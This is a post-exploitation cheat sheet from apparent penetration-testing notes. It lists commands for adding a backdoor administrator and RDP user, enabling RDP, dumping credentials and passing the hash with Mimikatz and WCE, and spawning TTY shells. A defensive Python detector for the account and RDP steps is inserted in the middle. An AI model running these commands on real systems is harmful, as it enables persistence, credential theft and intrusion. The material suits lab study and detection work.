Post exploitation
Don't stop here, you are only halfway.

Proof.txt

Linux
cat /root/proof.txt
Windows
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

Windows

Add RDP user

net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP

Via registry:
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Allow through the firewall (legacy netsh firewall context; replaced by netsh advfirewall on Vista and later):
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
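Defender-side view of the two blocks above, as an added example that is not part of the original notes: a small Python detector that correlates the account creation, sensitive group membership change and RDP enablement from parsed process-creation and registry events. The event shape and the sample records are constructed assumptions, not real telemetry.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry), shaped like parsed Sysmon
# process-creation (EID 1) and registry value-set (EID 13) records.
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process", "cmd": "net user hodor Qwerty123! /add"},
    {"host": "ws01", "type": "process", "cmd": "net localgroup administrators hodor /add"},
    {"host": "ws01", "type": "process", "cmd": 'net localgroup "Remote Desktop Users" hodor /add'},
    {"host": "ws01", "type": "registry",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections", "value": "0"},
    {"host": "ws01", "type": "process", "cmd": "netsh firewall set service remotedesktop enable"},
    {"host": "ws02", "type": "process", "cmd": "net user /domain"},  # lookup only, no /add
]

USER_ADD = re.compile(r"^net(1)?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)
GROUP_ADD = re.compile(r'^net(1)?(\.exe)?\s+localgroup\s+("[^"]+"|\S+)\s+\S+\s+/add\b', re.I)
RDP_FW = re.compile(r"^netsh\s+firewall\s+set\s+service\s+remotedesktop\s+enable\b", re.I)
SENSITIVE_GROUPS = {"administrators", "remote desktop users"}

def classify(event):
    """Return the technique tags one event matches (empty list if none)."""
    tags = []
    if event["type"] == "process":
        cmd = event["cmd"].strip()
        if USER_ADD.match(cmd):
            tags.append("local_user_created")
        m = GROUP_ADD.match(cmd)
        if m and m.group(3).strip('"').lower() in SENSITIVE_GROUPS:
            tags.append("sensitive_group_add")
        if RDP_FW.match(cmd):
            tags.append("rdp_firewall_opened")
    elif event["type"] == "registry":
        # fDenyTSConnections set to 0 turns RDP on, exactly what the reg add above does
        if event["key"].lower().endswith(r"\terminal server\fdenytsconnections") and event["value"] == "0":
            tags.append("rdp_enabled_registry")
    return tags

def flag_hosts(events, threshold=2):
    """Collect distinct tags per host; flag hosts showing at least `threshold` of them."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(classify(ev))
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= threshold}

if __name__ == "__main__":
    for host, tags in flag_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(tags)}")
```

Any single tag is noisy on its own (admins do create accounts); correlating two or more on one host within a short window is what makes the alert worth a look.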

Rdesktop resolution

rdesktop -g 1024x768 x.x.x.x

Passwords and hashes

Mimikatz

Extract passwords, keys, PIN codes and tickets from "lsass" memory:
privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords

Pass-the-hash
privilege::debug
log sekurlsa.log
sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd

Elevate token
privilege::debug
log sekurlsa.log
token::elevate

Dump SAM
privilege::debug
log sekurlsa.log
lsadump::sam

Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.
https://www.ampliasecurity.com/research/windows-credentials-editor/
C:\> wce -w

Networking

Active connections to other hosts (with owning PID):
netstat -ano
Hosts file
C:\WINDOWS\System32\drivers\etc\hosts
Firewall config
netsh firewall show state
netsh firewall show config
netsh dump

PowerShell tools

Empire

GitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.

PowerSploit

GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework

Linux

Spawn TTY shell

python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import os; os.system("/bin/bash")'
/bin/bash -i
/bin/sh -i
perl -e 'exec "/bin/sh";'